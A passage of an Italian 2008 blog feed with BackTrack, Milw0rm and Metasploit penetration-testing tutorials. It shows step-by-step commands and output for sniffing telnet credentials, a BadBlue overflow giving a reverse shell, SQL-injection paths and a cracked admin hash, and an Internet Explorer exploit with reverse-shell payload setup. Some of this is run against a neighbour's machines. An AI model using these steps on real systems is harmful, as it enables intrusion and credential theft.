<p>dove:. <strong>net user Administrator komintern </strong>è il comando che verrà eseguito sul server dopo il <strong>BoF</strong> , ovvero il cambio della password dalla precedente a <em><strong>komintern</strong></em> sul sistema del mio vicino di casa con il quale mi trovo nella stessa Lan&#8230;comando che per funzionare , questo va detto , mi ha costretto a modificare varie opzioni nel database e vari files di configurazione del PHP , <strong>php.ini</strong> eccetera.</p>
<p>Una volta cambiata la password dell&#8217; Administrator , apro una sessione <a href="http://it.wikipedia.org/wiki/Telnet"><strong>Telnet</strong></a> e mi connetto al Server con le credenziali create , per mostrarle ho fatto un semplicissimo <strong>sniffing</strong> con <strong>dsniff</strong> sulla mia stessa interfaccia di rete , con il comando:</p>
<p><strong><span style="color:#ff0000;">bt</span> <span style="color:#0000ff;">remote</span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;"> </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span></span></strong><strong> dsniff -i ath0</strong></p>
<p>che naturalmente ha funzionato alla perfezione mostrandomi le credenziali di accesso al server ovvero:</p>
<p><span style="color:#ff0000;"><strong>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
06/30/08 21:32:12 tcp 29.230.6.74.42449 -&gt; 29.230.6.73.23 (telnet)</strong><strong><br />
<span style="color:#ffcc00;">Komintern</span>Administrator<br />
komintern</strong><strong><br />
</strong></span></p>
<p>Aperta la sessione Telnet sono stato in grado di inetragire con tutto il sistema , la maggiorparte delle volte infatti se il servizio Telnet è abilitato , solo l&#8217; Administrator può interagire con il Desktop del sistema , non si lascia interagire un utente &#8220;normale&#8221; o anche del gruppo Administrators&#8230; &#8230;ma questo di solito , poi ognuno configura la propria rete come vuole.</p>
<p>Il giallo sta a rappresentare un semplice errore di sniffing di dsniff , perchè volendo copiare la parola komintern senza doverla digitare in seguito , e come potete vedere dal video lo username è stato unicamente <strong>Administrator</strong> , provando a dare meglio l&#8217; idea <strong>dsniff</strong> ha raccolto le credenziali in modo totale , senza che poi il login abbia o no avuto successo.</p>
<p>È ovvio che ho preso il caso dello xampp perché volevo realizzarci un video e fare una piccola dimostrazione , ma se ci saremmo dovuti occupare di fare pentesting su di un server esterno le cose non sarebbero cambiate di molto , ad ogni versione di <strong>MySQL</strong> , di <strong>PHP</strong> di <strong>CMS</strong> eccetera , corrispondono delle vulnerabilità e degli exploits , e con l&#8217; archivio di Milw0rm nella nostra <strong>BackTrack</strong> , abbiamo la possibilità di effettuare tutti i test che vogliamo. La maggiorparte delle volte che si sente parlare di siti che pubblicano exploits in &#8220;malomodo&#8221; , succede per il semplice fatto che chi fa danni , al 99% dei casi non va a scegliersi un obbiettivo da attaccare , che sarebbe a mio modo di vedere la cosa , <span style="text-decoration:underline;">sempre male </span>ma che dimostra capacità , ma lo fà andando in giro per <strong>dork</strong> , ovvero trovare in <strong>google</strong> tutti i siti vulnerabili per poi prendere il primo che capita e fare il danno&#8230; &#8230;cosa che , a quanto pare , rende più famosi , ma molto semplice ed inutile.</p>
<p style="text-align:center;">***</p>
<p>Andiamo adesso ad effettuare il nostro pentesting contro un sistema che ha come OS WindowsXpPro , nel video la prima demo.</p>
<p>facciamo una scansione delle porte tramite <strong>nMap</strong> , e vediamone il risultato&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">~ #</span></strong> </span><strong>nmap -sS -sV -T Aggressive 29.230.6.73 -v</strong></p>
<p><span style="color:#ff0000;">Starting Nmap 4.50 ( http://insecure.org ) at 2008-05-16 11:18 GMT<br />
Initiating ARP Ping Scan at 11:18<br />
Scanning 29.230.6.73 [1 port]<br />
Completed ARP Ping Scan at 11:18, 0.01s elapsed (1 total hosts)<br />
Initiating Parallel DNS resolution of 1 host. at 11:18<br />
Completed Parallel DNS resolution of 1 host. at 11:18, 0.05s elapsed<br />
Initiating SYN Stealth Scan at 11:18<br />
Scanning 29.230.6.73 [1711 ports]<br />
Discovered open port 81/tcp on 29.230.6.73<br />
Discovered open port 139/tcp on 29.230.6.73<br />
Discovered open port 912/tcp on 29.230.6.73<br />
Discovered open port 445/tcp on 29.230.6.73<br />
Discovered open port 135/tcp on 29.230.6.73<br />
Discovered open port 4662/tcp on 29.230.6.73<br />
Completed SYN Stealth Scan at 11:19, 7.24s elapsed (1711 total ports)<br />
Initiating Service scan at 11:19<br />
Scanning 6 services on 29.230.6.73<br />
Completed Service scan at 11:19, 11.07s elapsed (6 services on 1 host)<br />
SCRIPT ENGINE: Initiating script scanning.<br />
Initiating SCRIPT ENGINE at 11:19<br />
Completed SCRIPT ENGINE at 11:19, 0.21s elapsed<br />
Host 29.230.6.73 appears to be up &#8230; good.<br />
Interesting ports on 29.230.6.73:<br />
Not shown: 1705 filtered ports<br />
PORT     STATE SERVICE      VERSION<br />
81/tcp   open  http         BadBlue httpd 2.7<br />
135/tcp  open  msrpc        Microsoft Windows RPC<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds<br />
912/tcp  open  ftp          vsftpd or WU-FTPD<br />
4662/tcp open  edonkey?<br />
MAC Address: 00:13:8F:EB:1D:DD (Asiarock Incorporation)<br />
Service Info: OS: Windows</span></p>
<p><span style="color:#ff0000;">Host script results:<br />
|_ Discover OS Version over NetBIOS and SMB: Windows XP</span></p>
<p><span style="color:#ff0000;">Read data files from: /usr/local/share/nmap<br />
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 18.845 seconds<br />
Raw packets sent: 3417 (150.346KB) | Rcvd: 7 (318B)</span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>bene , come possiamo vedere sul sistema &#8220;vittima&#8221; ci sono , oltre a delle porte aperte che potrebbero essere sfruttate in altro modo , delle informazioni che possono esserci molto preziose , infatti dalle ultime righe possiamo benissimo leggere:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><strong><span style="color:#ff0000;">PORT     STATE SERVICE      VERSION<br />
81/tcp   open  http         BadBlue httpd 2.7</span></strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Sulla porta 80 quindi c&#8217;é in esecuzione il <strong>BadBlue</strong> , alla versione <strong>2.7</strong>.</p>
<p>Il BadBlue è un webserver che permette di poter condividere , pubblicamente o no , tutti i files , documenti , foto eccetera.</p>
<p>Il BadBlue a questa versione , che nMap ci ha restituito , contiene però una vulnerabilità che è molto grave come falla e ci permette di penetrare il sistema e dopo aver causato un <strong>BufferOverFlow</strong> ci permette anche di ottenere una <strong>reverse shell </strong>, i comandi , <strong>shellcode</strong> compreso , sono già tutti contenuti all&#8217; interno dell&#8217; exploit.</p>
<p>potete vedere benissimo dal video che non solo sono penetrato , grazie all&#8217; exploit , all&#8217; interno del sistema , ma ho anche cambiato la password dell&#8217; amministratore del sistema stesso con il seguente comando:</p>
<p><strong>net user KaB0T  brigante</strong></p>
<p><strong><span style="color:#ff0000;">C:\&gt; </span>net user </strong><strong><span style="color:#0000ff;">KaB0T</span></strong> <strong>brigante</strong></p>
<p><em>(<span style="text-decoration:underline;">KaB0T</span> è il nome di un mio vicino di casa con il quale mi condivido spesso la connessione&#8230;)</em></p>
<p>Il terzo ed ultimo esempio di pentesting , nel video seconda demo , con exploits targati milw0rm l&#8217; ho fatto con una semplicissima <strong>SQL-Injection</strong>&#8230;   &#8230;semplicissima per chi la usa , come nel nostro caso , ma per realizzare l&#8217; exploit non è così semplice.</p>
<p>La SQL-Injection che ho usato per questo test va a colpire una vulnerabilità insita nel <strong>CMS-Family Connection</strong> , alla versione <strong>1.4</strong>.</p>
<p>sempre con la stessa procedura , mi sono spostato nella directory giusta&#8230;</p>
<p><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">~ # </span></strong></span><strong>cd /pentest/exploits/milw0rm/</strong></p>
<p>ed ho raccolto i possibili risultati dall&#8217; archivio con il comando <strong>grep</strong>:</p>
<p><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">milw0rm # </span></strong></span><strong>grep Family sploitlist-bt.txt</strong></p>
<p><span style="text-decoration:underline;"><em>e questo è stato il risultato:</em></span></p>
<p><strong><span style="color:#ff0000;">./platforms/php/remote/892.txt phpMyFamily &lt;= 1.4.0 Admin Bypass SQL Injection<br />
./platforms/php/remote/1208.pl phpMyFamily &lt;= 1.4.0 SQL Injection Exploit<br />
./platforms/php/remote/5811.txt Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerability</span></strong></p>
<p style="text-align:center;">***</p>
<p style="text-align:left;">Ottenuto il risultato per il<strong> FamilyConnection-CMS</strong> cui mi trovavo davanti , sono andato nella directory giusta:</p>
<p style="text-align:left;"><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">milw0rm #</span></strong></span> <strong>cd platforms/php/remote/</strong></p>
<p style="text-align:left;">dopodiché essendo un file <strong>*.txt</strong> potevo aprirlo come volevo , con <strong>nano</strong> , <strong>vim</strong> , <strong>kate</strong> , visto che non finisce in <strong>shell</strong> come i precedenti due esempi l&#8217; ho aperto con lo <strong>Scintilla</strong>&#8230;  &#8230;lo <strong>SciTE</strong> , editor adattabile a molti linguaggi di progrmmaione compreso in <strong>BackTrack</strong> di prima installazione , quindi:</p>
<p style="text-align:left;"><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">remote # </span></strong></span><strong>SciTE 5811.txt</strong></p>
<p style="text-align:left;">aperto il file <strong>*.txt</strong> ho letto le seguenti indicazioni:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">First you must register for access to user section then SQL Injection Exploit !!!</p>
<p>&#8212;&#8212;&#8212;-<br />
<strong>Exploits</strong><br />
&#8212;&#8212;&#8212;-<br />
<strong>[+]</strong> /addressbook.php?address=<strong>&lt;SQL Injection&gt;</strong><br />
<strong>[+]</strong> /familynews.php?getnews=<strong>&lt;SQL Injection&gt;&amp;newsid=2</strong><br />
<strong>[+]</strong> /home.php?action=results&amp;poll_id=<strong>&lt;SQL Injection&gt;</strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">dopodiché ho eseguito l&#8217; Injection ed ho ottenuto le credenziali di accesso dell&#8217; amministratore del sito , ovvero:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>admin : 6970ff8bb08f3c1bde2f49c608ac4b21</strong></span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">Una volta preso l hash dell&#8217; admin , vado direttamente sul sito di <strong>milw0rm.com</strong> sul link <strong>cracker</strong> e inserisco l hash selezionando naturalmente come opzione di criptatura <strong>md5</strong> , aspetto non molto , visto che già l&#8217; avevo fatta prima l&#8217; operazione e ottengo la password con la quale in seguito effettuo l&#8217; accesso al CMS come amministratore.</p>
<p style="text-align:left;">Naturalmente avrei potuto fare anche una prova con<strong> John The Ripper</strong> o altre soluzioni <strong>OFF-Line</strong> inserite in BackTrack , ma parlando dell&#8217; archivio degli exploits di milw0rm.com ho ritenuto migliore soluzione lavorare con lo stesso cracker di milw0rm , oltretutto in questo modo si contribuisce ad aggiungere un altro hash crackato , sperando sempre che non finisca nelle mani sbagliate.</p>
<p>Questa è solo una semplicissima dimostrazione di come è possibile fare pentesting con estrema facilità e nel minor tempo possibile , del resto da un&#8217; accoppiata come <span style="text-decoration:underline;"><strong>Milw0rm &amp; BackTrack</strong></span> ci si può aspettare solo il top.</p>
<p>Spero di essere stato abbastanza chiaro , per ogni cosa nella pagina <strong>/video</strong> c&#8217;é il videotutorial di questo  How-To&#8230; per ogni chiarimento siamo in <strong>canale</strong> e in <strong>mailinglist</strong>.</p>
<p>I commenti quì nel blog cortesemente , usateli come comnmenti , non come help-desk.</p>
<p>Ciao a tutti e alla prossima.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/517/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/517/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/517/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=517&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/02/milw0rm_cracker.jpg" medium="image">
			<media:title type="html">milw0rm_cracker.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>Metasploit Framework</title>
		<link>http://carlitobrigante.wordpress.com/2008/01/28/metasploitframework/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/01/28/metasploitframework/#comments</comments>
		<pubDate>Mon, 28 Jan 2008 04:48:08 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/Penetration]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=194</guid>
		<description><![CDATA[ 
&#160;
 Ciao a tutti,
eccoci arrivati alla descrizione di uno strumento che ha praticamente rivoluzionato il mondo della sicurezza informatica , stiamo parlando del progetto &#8220;MetaSploitFramework&#8220;.
Partiamo però dalla teoria , in modo che tutti possano rendersi conto di quello che sto per descrivervi&#8230;
Cos&#8217;é il progetto Metasploit?
Metasploit è un progetto nato dall&#8217; unione di più persone [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=194&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p align="center"> <a href="http://carlitobrigante.wordpress.com/2008/01/28/metasploitframework/231/" rel="attachment wp-att-231" title="metasploit.jpg"><img src="http://carlitobrigante.files.wordpress.com/2008/02/resource.png" alt="resource.png" /></a></p>
<p align="center">&nbsp;</p>
<p align="center"> Ciao a tutti,</p>
<p>eccoci arrivati alla descrizione di uno strumento che ha praticamente rivoluzionato il mondo della sicurezza informatica , stiamo parlando del progetto &#8220;<a href="http://framework.metasploit.com/"><b>MetaSploitFramework</b></a>&#8220;.</p>
<p>Partiamo però dalla teoria , in modo che tutti possano rendersi conto di quello che sto per descrivervi&#8230;</p>
<p>Cos&#8217;é il progetto Metasploit?</p>
<p><a href="http://framework.metasploit.com/msf/">Metasploit</a> è un progetto nato dall&#8217; unione di più persone appassionate di informatica , di sicurezza e di programmazione , che si sono dedicate a questo progetto per fare in modo che tutti gli amministratori di siti , di interi network , e di importanti o meno portali informatici , possano , tramite l&#8217; uso del framework , proteggersi da malintenzionati , che in un mondo come quello dell&#8217;informatica , non mancano mai.</p>
<p>Tramite il progetto metasploit framework , tutti gli amministratori di reti , possono utilizzare e scrivere <i><b>exploits</b></i> e <i><b>shellcode</b></i> , (o <i><b>payloads)</b></i> , e testare facilmente la loro sicurezza in modo da rendersi conto o meno dei vari rischi che possono affliggere le loro reti/applicazioni.</p>
<p>Metasploit framework , vuole quindi essere un progetto che , tramite nuove tecniche di exploit , mira al rafforzamento della sicurezza informatica in generale , fornendo a tutti , nuovi e facilitati strumenti per il pentesting , utilizzabili da chiunque e  soprattutto opensource.</p>
<p>Da quello che ho appena detto è facile intendere che se un amministratore si tiene aggiornato tramite questo framework , sarà difficile incappare in scriptkiddies e malintenzionati vari.</p>
<p>Gli strumenti forniti dall&#8217; intero framework sono molti , basta recarsi a <a href="http://www.metasploit.com/releases.html"><b>questa</b></a> pagina per vederli tutti , noi naturalmente useremo gli strumenti inseriti in <b>backtrack</b>.</p>
<p>Sottolineare la questione opensource è fondamentale per comprendere il progetto MSF , per il semplice fatto non è l&#8217; unico strumento di questo tipo , ma essendo l&#8217;unico opensource , è secondo me , l&#8217;unico degno di nota.</p>
<p>Tramite la raccolta , sempre aggiornata di exploit  , MSF fornisce uno strumento eccezionale e che , essendo opensource , può arrivare alle porte di tutti gli ineterssati , e data la sua importanza ed efficacia , non poteva mancare in una security-distro come la backtrack , che infatti fornisce di default MSF in tutte le versioni , fin dalla nascita del progetto.</p>
<p>Metasploitframework fornisce una vasta gamma di exploit , che possono sfruttare vulnerabilità che affliggono reti , con tutti i vari tipi di protocolli dal SAMBA alle VPN, database basati su MySQL fino agli Oracle , server Microsoft come anche Apache , Pc che girano con Windows (tutte le versioni di Windows dalla 95 all&#8217; XP) , come anche UNIX Solaris e LINUX , e tantissime applicazioni , dai browser come Firefox fino ad arrivare a Internet Explorer , da RealVNC fino al messanger di Yahoo ; insomma  Metasploitframework è un grande progetto che se ben usufruito può dare risultati di protezione eccezionali. I più assidui lettori di advertising e securitynews , già si vedono arrivare advertising con relativi exploits per il pentesting della propria rete , usufruibile appunto tramite il framework Metasploit.</p>
<p>MSF è utilizzabile da diveri O.S. , dai sistemi basati su GNU/Linux , fino ad arrivare a BSD e Windows (<i>quì vi segnalo per coloro che usano sistemi Microsoft una buona</i> <a href="http://www.notageek.it/metasploit-framework-tutorial-part1.html"><i><b>guida</b></i></a> ) , e parlo sia tramite Shell , (o prompt per gli utenti Windows) , fino all&#8217; utilizzo dell&#8217; interfaccia grafica tramite interprete e librerie <a href="http://it.wikipedia.org/wiki/Ruby"><b>Ruby</b></a> installate.</p>
<p>Nella <b>backtrack</b> attualmente , sono fornite due versioni del progetto MSF , la versione 2 e la 3.</p>
<p>La versione 2 è stata attualmente abbandonata , per far posto alla versione 3 ,  ma vediamo un pò più da vicino quello che può essere l&#8217; utilizzo del framework.</p>
<p>Innanzitutto voglio dire che la disponibilità degli amministratori di MSF , fornisce a tutti gli strumenti per comprendere il funzionamento del loro progetto , ci sono sul sito ufficiale di MSF tutti gli strumenti necessari per utilizzare il MSF che agli utenti , di <b>backtrack</b> e non , si presenta in 4 maniere di diverso utilizzo :</p>
<p>La <b>MSFconsole</b> , che fornisce appunto l&#8217;utilizzo del framework tramite konsole-Terminale-Shell , chiamatela come volete , e che secondo me , data la sua logica e stabilità , è la migliore soluzione , e devo dire che l&#8217;impostazione è anche avvastanza userfriendly.</p>
<p>Il <b>MSFweb</b> , che fornisce a tutti coloro che hanno problemi di adeguamento a konsole e terminali , uno strumento tramite interfaccia web , che può per alcuni risultare più familiare , e che è raggiungibile sulla porta 55555 del proprio localhost , praticamente all&#8217;indirizzo <b>http://127.0.0.1/55555/</b></p>
<p>Il <b>MSFgui</b> , ovvero il MSF con interfaccia grafica , (<i>attualmente non utilizzabile in backtrack3beta per la mancanza di librerie , la <b>gnome-gtk2</b> a me ha dato pr</i><i>oblemi e non sono riuscito ad avviare MSF anche con interprete Ruby</i> e altre librerie installate).</p>
<p>Il <b>MSFcli </b>, ovvero l&#8217;utilizzo di Metasploitframework in modalità konsole , senza l&#8217;interattività che invece ha MSFconsole , ma che permette di inviare l&#8217;exploit tramite il comando in una sola riga.</p>
<p>Va detto che in <b>backtrack </b>sono inseriti di default altri tools che hanno un metodo di lavoro che usufruisce del Metasploitframework , come <b>Fast-Track</b> e l&#8217; <b>Autopowning </b>, oppure come il nuovo progetto <b>blue-track </b>, ma sono secondo me argomenti che vanno trattati singolarmente e dopo la totale comprensione di <b>MSF</b>.</p>
<p align="center">&nbsp;</p>
<p><img src="http://carlitobrigante.files.wordpress.com/2008/01/metasploit_logos_main.gif" alt="metasploit_logos_main.gif" height="173" width="443" /></p>
<p>Come funziona un attacco con Metasploitframework?</p>
<p>L&#8217; attacco tramite il MetaSloitFramework , va eseguito effettuando una serie di passi ,(<a href="http://www.metasploit.com:55555/"><i>quì una DEMO online</i></a> ) che sono:</p>
<p>1) &#8211; Individuazione del sistema vittima tramite scansione e relativa scelta e scansione dell&#8217; <b>exploit</b> per la vulnerabilità individuata.</p>
<p>2) &#8211; Scelta e configurazione del <b>payload</b> (o <b>shellcode</b>) , da eseguire dopo l&#8217; eventuale successo ottenuto dall&#8217; exploit.</p>
<p>3) &#8211; <b>Exploitation</b> , invio dell&#8217; <b>exploit</b>.</p>
<p>Questi sono i processi fondamentali da eseguire , ma non gli unici , comunque vediamoli singolarmente.</p>
<p>L&#8217; individuazione del sistema vittima viene eseguita naturalmente tramite vari strumenti , uno di questi può essere ad esempio uno scanner , e quale scanner più potente , leggero e dettagliato , da inserire all&#8217; interno di un framework se non l&#8217; <b>nmap</b>.</p>
<p>L&#8217; <a href="http://insecure.org/"><b>nMap</b></a> è inserito all&#8217; interno di MSF , e può essere facilmente richiamato tramite il comando <b>nmap</b> , e vedremo che subito ci verranno elencate tutte le opzioni dello scanning , che è solo uno dei tool usufruibili nel framework metasploit.</p>
<p>Una volta individuato il sistema vittima , con tutte le applicazioni e vulnerabilità annesse , bisogna scegliere un exploit.</p>
<p align="center"><b>******************</b></p>
<p><i><font color="#ff0000">I tutorial che vengono pubblicati su questo blog , (speriamo di poterlo chiamare presto sito&#8230;) , sono tutti testati , e siccome è stato fatto da noi un video a riguardo di un attacco con l&#8217; utilizzo del <b>Metasploitframework</b> , baserò questo articolo/Tutorial sul video che abbiamo fatto , e che potete trovare naturalmente nell&#8217; apposita sezione dei </font><a href="http://carlitobrigante.wordpress.com/video/"><b>video</b>.</a></i></p>
<p align="center"><b>******************</b></p>
<p>Per lavorare e provare il Metasploitframework , ho selezionato  il Framework versione 2 , da:</p>
<p><i><b>KDEmenu</b>&#8211;&gt;<b>backtrack</b>&#8212;&gt;<b>Penetration</b>&#8211;&gt;<b>Metasploit Exploitation Framework</b>&#8211;&gt;<b>Framework  Version 2</b>&#8211;&gt;<b><font color="#0000ff">MSFconsole</font></b></i><br />
Per scegliere l&#8217; exploit , ho eseguito il comando che mostra tutti gli exploit disponibili , <b>show exploits</b>.</p>
<p>Riporto solo alcuni screenshots per comodità di spazio&#8230;</p>
<p><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-2.png" title="msf-2.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-2.thumbnail.png" alt="msf-2.png" /></a><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-2.png" title="msf-2.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-2.thumbnail.png" alt="msf-2.png" /></a><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-3.png" title="msf-3.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-3.thumbnail.png" alt="msf-3.png" /></a><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-4.png" title="msf-4.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-4.thumbnail.png" alt="msf-4.png" /></a></p>
<p>Quì ho scelto di usare l&#8217; exploit:<b>&#8220;ie_vml_rectfill&#8221;</b> <b>,</b> questo , già dal codice , è un exploit che sfrutta una vulnerbilità insita in Internet Explorer alla versione 6 , e che permette all&#8217; attaccante di eseguire del codice sul host della vittima.</p>
<p>un exploit , dopo la scelta , deve essere inserito e configurato , e viene fatta questa operazione tramite il comando <b>use</b> , e come configurazione visto che ogni exploit vuole una configurazione diversa , per farla ho digitato il comando <b>show options</b> , il quale mostra tutte le opzioni necessarie all&#8217; uso dell&#8217; exploit selezionato , e gli obbiettivi/target  , a cui l&#8217; exploit può far capo con successo.</p>
<p>il comando che ho dato quindi è (<font color="#ff0000">rosso-comando-sistema </font>/ nero-comando-utente):</p>
<p><b><font color="#ff0000">msf &gt;</font> use ie_vml_rectfill</b></p>
<p><i>dopodiché per vedere le opzioni di cui l&#8217;exploit necessita ho dato il comando show options:</i></p>
<p><b><font color="#ff0000">msf ie_vml_rectfill &gt; </font>show options</b></p>
<p><font color="#ff0000">Exploit and Payload Options<br />
===========================</font></p>
<p><font color="#ff0000">Exploit:    Name        Default    Description<br />
&#8212;&#8212;&#8211;    &#8212;&#8212;&#8211;    &#8212;&#8212;-    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
optional    HTTPHOST    0.0.0.0    The local HTTP listener host<br />
required    HTTPPORT    8080       The local HTTP listener port</font></p>
<p><font color="#ff0000">Payload:    Name        Default        Description<br />
&#8212;&#8212;&#8211;    &#8212;&#8212;&#8211;    &#8212;&#8212;&#8212;&#8211;    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
required    EXITFUNC    seh            Exit technique: &#8220;process&#8221;, &#8220;thread&#8221;, &#8220;seh&#8221;<br />
required    LHOST       XX.XXX.X.XX    Local address to receive connection<br />
required    LPORT       4321           Local port to receive connection</font></p>
<p><font color="#ff0000">Target: Windows NT 4.0 -&gt; Windows 2003 SP1</font><b></b></p>
<p><b><font color="#ff0000">msf ie_vml_rectfill(win32_reverse) &gt;</font></b></p>
<p align="center"><b>*********************</b></p>
<p align="center">Apro una piccola parentesi per dire che in ogni momento è possibile richiamare tramite alcuni comandi la lista disponibile di <b>nops</b> , <b>encoders</b> , <b>exploits</b><b> </b>e di comandi disponibili tramite il comando <b>help</b>.</p>
<p align="left"><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-7.png" title="msf-7.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-7.thumbnail.png" alt="msf-7.png" /></a><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-8.png" title="msf-8.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-8.thumbnail.png" alt="msf-8.png" /></a><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-7.png" title="msf-7.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-7.thumbnail.png" alt="msf-7.png" /></a></p>
<p align="left"><i>(gli exploits sono stati riportati negli screenshots precedenti&#8230;) </i></p>
<p align="center"><b>***********</b></p>
<p align="left"><b></b>Per scegliere il payload diamo il seuente comando:</p>
<p align="left"><b><font color="#ff0000">msf ie_vml_rectfill(win32_reverse) &gt; </font>show payloads</b></p>
<p align="left"><font color="#ff0000">Metasploit Framework Usable Payloads<br />
====================================</font></p>
<p><font color="#ff0000">win32_downloadexec <font color="#0000ff">Windows Executable Download and Execute</font><br />
win32_exec<font color="#0000ff">                                                </font><font color="#0000ff">Windows Execute Command</font><br />
win32_passivex                                                                                <font color="#0000ff">Windows PassiveX ActiveX Injection Payload</font><br />
win32_passivex_meterpreter<font color="#0000ff">                        Windows PassiveX ActiveX Inject Meterpreter Payload</font><br />
win32_passivex_stg                                                               <font color="#0000ff">Windows Staged PassiveX Shell</font><br />
win32_passivex_vncinject                                <font color="#0000ff">Windows PassiveX ActiveX Inject VNC Server Payload</font><br />
win32_reverse                                                                                     <font color="#0000ff">Windows Reverse Shell</font><br />
win32_reverse_dllinject                                       <font color="#0000ff">Windows Reverse DLL Inject</font><br />
win32_reverse_meterpreter                       <font color="#0000ff">Windows Reverse Meterpreter DLL Inject<br />
</font> win32_reverse_stg                                       <font color="#0000ff">Windows   Staged Reverse Shell</font><br />
win32_reverse_stg_upexec                          <font color="#0000ff">Windows Staged Reverse Upload/Execute</font><br />
win32_reverse_vncinject<font color="#0000ff">                             Windows Reverse VNC Server Inject</font></font></p>
<p>Questi i payloads disponibili , e da questi non dobbiamo fare altro che selezionarne uno e vedere se necessita di configurazione , quindi con il comando seguente selezioniamo per il nostro attacco il payload: <b><font color="#ff0000">win32_exec</font></b> , il quale ci consentirà l&#8217;esecuzione di comandi tramite il prompt Windows Xp , che è il sistema attaccato.</p>
<p><b><font color="#ff0000">msf ie_vml_rectfill &gt;</font> set PAYLOAD win32_reverse</b></p>
<p>una volta eseguita la selezione del payload , come per l&#8217; exploit vediamo le opzioni di cui necessita , diamo quindi il solito comando <b>show option</b> , ottenendo il risultato seguente:</p>
<p><b><font color="#ff0000">msf ie_vml_rectfill(win32_reverse) &gt; </font>show options</b></p>
<p><font color="#ff0000">Exploit and Payload Options<br />
===========================</font></p>
<p><font color="#ff0000">Exploit:    Name        Default    Description<br />
&#8212;&#8212;&#8211;    &#8212;&#8212;&#8211;    &#8212;&#8212;-    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
optional    HTTPHOST    0.0.0.0    The local HTTP listener host<br />
required    HTTPPORT    8080       The local HTTP listener port</font></p>
<p><font color="#ff0000">Payload:    Name        Default        Description<br />
&#8212;&#8212;&#8211;    &#8212;&#8212;&#8211;    &#8212;&#8212;&#8212;&#8211;    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
required    EXITFUNC    seh            Exit technique: &#8220;process&#8221;, &#8220;thread&#8221;, &#8220;seh&#8221;<br />
required    LHOST       29.230.6.74    Local address to receive connection<br />
required    LPORT       4321           Local port to receive connection</font></p>
